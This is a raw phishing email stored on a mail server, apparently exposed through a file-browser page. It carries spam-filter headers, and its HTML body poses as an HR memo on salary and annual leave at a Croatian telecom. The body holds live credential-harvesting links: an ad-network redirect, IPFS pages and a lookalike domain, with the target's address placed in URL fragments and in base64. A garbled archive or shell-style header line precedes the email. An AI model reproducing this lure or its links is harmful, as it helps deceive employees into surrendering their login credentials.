PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/ithome/mail/cur/ |
| Server: Linux host100322.itwesthosting.com 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64 IP: 144.91.64.173 |
| Dir : /home/ithome/mail/cur/1757440362.M712193P9097.host100322.itwesthosting.com,S=9260,W=9413:2, |
Return-Path: <stzz@standadaero.com>
Delivered-To: ithome@host100322.itwesthosting.com
Received: from host100322.itwesthosting.com
by host100322.itwesthosting.com with LMTP
id 4DBRKmppwGiJIwAAp0YrwQ
(envelope-from <stzz@standadaero.com>)
for <ithome@host100322.itwesthosting.com>; Tue, 09 Sep 2025 19:52:42 +0200
Return-path: <stzz@standadaero.com>
Envelope-to: info@h1telekom.hr
Delivery-date: Tue, 09 Sep 2025 19:52:42 +0200
Received: from [154.127.53.234] (port=58207)
by host100322.itwesthosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.96.2)
(envelope-from <stzz@standadaero.com>)
id 1uw2WH-0002OK-0h
for info@h1telekom.hr;
Tue, 09 Sep 2025 19:52:42 +0200
From: HR Manager <stzz@standadaero.com>
To: info@h1telekom.hr
Date: 9 Sep 2025 10:52:39 -0700
Message-ID: <20250909105238.02A90A807E29DB7C@standadaero.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam-Status: Yes, score=20.4
X-Spam-Score: 204
X-Spam-Bar: ++++++++++++++++++++
X-Spam-Report: Spam detection software, running on the system "host100322.itwesthosting.com",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
root\@localhost for details.
Content preview: Dear Team, Kindly check the staff memo referring to the above
subject from HR for our 2025 / annual open vacation plan. ticketfind-and-update.staff-information.h1telekom.hr/company/info/officers
Content analysis details: (20.4 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was
blocked. See
http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
for more information.
[URIs: adnxs.com]
2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus
DBL blocklist
[URIs: oortstorages.com]
1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL
blocklist
[URIs: oortstorages.com]
0.0 URIBL_PH_SURBL Contains an URL listed in the PH SURBL blocklist
[URIs: oortstorages.com]
0.5 JMQ_SPF_NEUTRAL ASKDNS: SPF set to ?all
[standadaero.com TXT:v=spf1 a mx]
[ip4:104.36.229.126 a:standadaero.com]
[include:server.standadaero.com]
[include:mail.standadaero.com ?all]
3.6 RCVD_IN_PBL RBL: Received via a relay in Spamhaus PBL
[154.127.53.234 listed in zen.spamhaus.org]
4.7 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
0.0 T_SPF_PERMERROR SPF: test of record failed (permerror)
0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[154.127.53.234 listed in bl.score.senderscore.com]
0.0 T_MXG_EMAIL_FRAG URI with email in fragment
0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.0 HTML_MESSAGE BODY: HTML included in message
0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
The query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[154.127.53.234 listed in sa-accredit.habeas.com]
2.8 URI_IPFSIO References Interplanetary File System PtP content via
ipfs.io, likely phishing
0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict
Alignment
0.0 KAM_SHORT Use of a URL Shortener for very short URL
0.2 KAM_DMARC_NONE DKIM has Failed or SPF has failed on the message
and the domain has no DMARC policy
2.0 RDNS_NONE Delivered to internal network by a host with no rDNS
2.0 MIXED_HREF_CASE Has href in mixed case
0.0 URI_IPFS References Interplanetary File System PtP content,
probable phishing
0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML
only
X-Spam-Flag: YES
Subject: ***SPAM*** Employees Salary And Annual Leave Approval/Application for H1Telekom Email
X-From-Rewrite: unmodified, forwarded message
<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<DIV dir=3Dltr>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>Dear Team,</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>Kindly check the staff memo referring to the above subjec=
t from HR for our 2025 / annual open vacation plan.</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><BR>=
<FONT color=3D#00418f>
<A href=3D"https://secure.adnxs.com/clktrb?id=3D704169&amp;redir=3Dhttp=
s://mst.standard.us-east-1.oortstorages.com/redrtpg#info@h1telekom.hr" rel=
=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"https://ww=
w.google.com/url?q=3Dhttps://storage.yandexcloud.net/versof/-php.html%23%5B=
%5B-Email-%5D%5D&source=3Dgmail&ust=3D1757519506728000&usg=3DAO=
vVaw0015Y4LP8H4w9Xvj1hhVUJ">ticketfind-and-update.staff-<WBR>information.h1=
telekom.hr/<WBR>company/info/officers</A></FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><BR>=
<FONT color=3D#00418f>Please do note that all names highlighted in Red are =
the ones approved for open vacation.</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>Kindly return your response to verify date on or before 1=
2/09/2025 11:34:14 AM .</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>Please let me know, should you have further questions.</F=
ONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f> <BR><BR>Thanks & Regards,</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>Director of Human Resources</FONT></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","Se=
goe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; COLOR: rgb(33,33,33)'><FON=
T color=3D#00418f>HR Manager<BR>Email :- </FONT><A rel=3D"noopener nor=
eferrer" target=3D_blank><FONT color=3D#00418f></FONT></A><FONT color=3D#00=
418f>
<A href=3D"https://ipfs.io/ipfs/bafkreicfdjz6ryrzf2eqbbzdidpomgutps2sn4qg7n=
4xihh5ciybuur7je#jani@primoindoikan.com" rel=3D"noopener noreferrer" target=
=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ip=
fs.io/ipfs/bafkreicfdjz6ryrzf2eqbbzdidpomgutps2sn4qg7n4xihh5ciybuur7je%23ja=
ni@primoindoikan.com&source=3Dgmail&ust=3D1757519506728000&usg=
=3DAOvVaw1RYDXd6WuK3kWWQfHh6kWW">HR</A>@h1telekom.hr</FONT><BR><FONT color=
=3D#00418f>Web :- </FONT><FONT color=3D#00418f></FONT>
<FONT color=3D#00418f><A href=3D"https://resourcesevergreenbasics.mc-boumer=
des.com/?email=3DamFuaUBwcmltb2luZG9pa2FuLmNvbQ=3D=3D" rel=3D"noopener nore=
ferrer" target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?=
q=3Dhttps://resourcesevergreenbasics.mc-boumerdes.com/?email%3DamFuaUBwcmlt=
b2luZG9pa2FuLmNvbQ%3D%3D&source=3Dgmail&ust=3D1757519506728000&=
usg=3DAOvVaw3SifkwuNa_EvL02y-erTE4">http://www.</A></FONT>
<A href=3D"https://ipfs.io/ipfs/bafkreicfdjz6ryrzf2eqbbzdidpomgutps2sn4qg7n=
4xihh5ciybuur7je#jani@primoindoikan.com" rel=3D"noopener noreferrer" target=
=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ip=
fs.io/ipfs/bafkreicfdjz6ryrzf2eqbbzdidpomgutps2sn4qg7n4xihh5ciybuur7je%23ja=
ni@primoindoikan.com&source=3Dgmail&ust=3D1757519506728000&usg=
=3DAOvVaw1RYDXd6WuK3kWWQfHh6kWW">h1telekom.hr/</A></P></DIV></BODY></HTML>